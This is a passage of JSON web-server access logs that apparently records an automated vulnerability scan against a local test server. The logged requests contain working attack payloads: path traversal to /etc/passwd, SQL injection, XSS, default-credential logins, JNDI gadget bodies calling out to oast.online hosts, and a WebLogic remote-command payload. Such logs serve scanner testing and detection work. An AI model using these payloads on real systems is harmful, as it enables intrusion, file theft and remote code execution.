5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/health HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.shiro.jndi.JndiObjectFactory\x22,\x0D\x0A \x22resourceName\x22:\x22rmi://c9v8gc8smpv8b0ng0t00816iyyxenzhkf.oast.online/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"","request":"GET / HTTP/1.0","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httpd.conf HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /matomo HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /vendor/phpfastcache/phpfastcache/examples/phpinfo.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /net/net/net.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/downloads?fileName=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"csrfmiddlewaretoken={{csrfmiddlewaretoken}}&username=cloudera&password=cloudera&next=%2F","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /hue/accounts/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ProtectManager/Logon HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.036","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /s/sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"\x0D\x0A\x0D\x0A\x0D\x0A \x0D\x0A &test;\x0D\x0A \x0D\x0A \x0D\x0A com.jamfsoftware.jamfdistributionserver\x0D\x0A 1652459578\x0D\x0A \x0D\x0A 00000000-0000-0000-0000-000000000000\x0D\x0A com.jamfsoftware.jamf.distributionserverinventoryrequest\x0D\x0A \x0D\x0A 1999\x0D\x0A 1652459578\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 34\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /client HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?id=50&file=../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/api-docs/swagger.yaml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"webdav_mode=false&script=from+pyspider.libs.base_handler+import+*%0Aclass+Handler(BaseHandler)%3A%0A++++def+on_start(self)%3A%0A++++++++print(str(452345672+%2B+567890765))&task=%7B%0A++%22process%22%3A+%7B%0A++++%22callback%22%3A+%22on_start%22%0A++%7D%2C%0A++%22project%22%3A+%22pyspidervulntest%22%2C%0A++%22taskid%22%3A+%22data%3A%2Con_start%22%2C%0A++%22url%22%3A+%22data%3A%2Con_start%22%0A%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /debug/pyspidervulntest/run HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup\x22,\x0D\x0A \x22jndiNames\x22:\x22rmi://c9v8gc8smpv8b0ng0t00dbu7uzxr1fu3j.oast.online/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.068","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /msa/main.xp?Fun=msaDataCenetrDownLoadMore+delflag=1+downLoadFileName=msagroup.txt+downLoadFile=../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1\x22%20onmouseover=alert(document.domain)// HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22id\x22: \x22nuclei\x22,\x0D\x0A \x22filters\x22: [\x0D\x0A {\x0D\x0A \x22condition\x22: {\x0D\x0A \x22parameterValues\x22: {\x0D\x0A \x22nuclei\x22: \x22script::Runtime.getRuntime().exec('id')\x22\x0D\x0A },\x0D\x0A \x22type\x22: \x22profilePropertyCondition\x22\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A }\x0D\x0A ],\x0D\x0A \x22sessionId\x22: \x22nuclei\x22\x0D\x0A}\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /context.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zipkin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_vti_bin/Authentication.asmx?op=Mode HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.053","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sfsites/aura HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-includes/ALFA_DATA/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Sitefinity/Authenticate/SWT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /msa/../../../../../../../../etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/swagger-ui/swagger.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /airflow.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"{\x0D\x0A \x22@type\x22:\x22br.com.anteros.dbcp.AnterosDBCPConfig\x22,\x0D\x0A \x22metricRegistry\x22:\x22rmi:/c9v8gc8smpv8b0ng0t00b3eastkwbtkcf.oast.online/Exploit\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.067","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /servicedesk/customer/portal/10/user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wpdm-cache/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:58 +0000","request_body":"loginUsername=admin&loginPassword=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /druid/submitLogin HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/env HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.059","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /core/config/databases.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dompdf.php?input_file=dompdf.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?/AdminAppData@no-mobile-0/0/15503332983847185/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField(\x22connectionHandler\x22);field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod(\x22getServletRequest\x22).invoke(obj); String cmd = req.getHeader(\x22CMD\x22);String[] cmds = System.getProperty(\x22os.name\x22).toLowerCase().contains(\x22window\x22) ? new String[]{\x22cmd.exe\x22, \x22/c\x22, cmd} : new String[]{\x22/bin/sh\x22, \x22-c\x22, cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter(\x22\x5C\x5CA\x22).next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod(\x22getResponse\x22).invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.068","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /calendar_form.php/%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.037","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 +0000","request_body":"test_data","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /analytics/telemetry/ph/api/hyper/send?_c&_i=test HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:32:59 